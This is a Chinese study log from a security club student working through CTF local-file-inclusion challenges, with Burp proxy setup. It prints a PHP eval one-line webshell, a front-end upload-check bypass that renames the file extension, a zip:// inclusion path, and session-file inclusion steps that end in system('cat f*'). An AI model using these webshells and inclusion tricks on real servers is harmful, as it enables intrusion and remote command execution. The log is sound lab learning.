御林安全工作室学习第三天 文件包含6,7,burpsite代理设置 10
感谢sake大佬不厌其烦的教我,在过程中大佬一直很温柔很耐心呜呜呜
HTTP content-type | 菜鸟教程 (runoob.com)
LFI-6
首先确定是文件上传漏洞,大致思路为上传jpg格式或者zip格式文件的一句话木马然后antsword连接进入后台
记事本写一个重命名就好,这里直接抄了捧到脸上的flag(bushi
上传成功之后应该想办法进到文件里面包含本地文件
/var/www/html\uploads/266f3804be26b9a788ebc8913694f25c.jpg succesfully uploaded!
上传图片格式一句话木马_phpjpg一句话木马_Stars-Again的博客-CSDN博客
做一半不会了按大佬的思路做一遍吧(好吧这是绕过前端检测的,下面尝试失败了
但是这个题适用于FILEUPLOAD1,3
大概思路就是两个名字一样的文件后缀分别为jpg和php,然后burp内置浏览器上传文件jpg绕过前端校验然后拦截
把请求后缀名改成php上传成功,文件内容都为<?php @eval($_POST["cmd"]); ?>
一句话木马,cmd即为连接密码
设置浏览器代理端口5200
burpsite代理设置相同确保拦截
还是没做出来换个思路用zip试一下
/var/www/html\uploads/be813616d018eddec4c64966011fff26.zip succesfully uploaded!
/?file==zip://[压缩包绝对路径]%23[压缩包内文件]
CTF-WEB:经典文件上传漏洞 - 乌漆WhiteMoon - 博客园 (cnblogs.com)
参考上述最后一个文章
思考:可能需要绕过
试一试老办法木马吧,system('ls');
uploads/48652543ee39aaed60a3a7200a4b70fd.zip
LFI-7
session文件包含漏洞 - 知乎 (zhihu.com)
大佬推荐博客
Session 文件包含漏洞 - 简书 (jianshu.com)
参考
前置知识:
题目:
因此这道题是session包含
CTF中Session文件包含与条件竞争 - k1he - 博客园 (cnblogs.com)
第一步应该先找到session文件名传cookie进去
查看cookie
坏消息,没有sessionid
这个是错误示范。
做完题后的思路整理
第一步
sessionid是通过cookie的PHPSESSID传递然后拼接为sess_PHPSESSID的session文件,文件名没有后缀
phpinfo中查看session路径
第二步
a传递username变量存储到session文件,这里存了一句话木马<?php @eval($_POST["b"]); ?>,并把特殊字符url编码
第三步
通过file参数,因为是$_REQUEST所以POST和GET都可以传递参数,包含sess_222,注意包含绝对路径,包含一句话木马就可以通过POST传递参数b任意参数eval执行任意命令
第四步
b传递命令system('ls');查看目录下所有文件,找到flag_****文件
注意:a,b,file三个参数最好同时进行,session文件存在时间较短
第五步
传递参数system("cat%20f*");
这里的*意思是通配符匹配所有第一个字母为f的文件
system("");是系统命令执行函数,使用
得到flag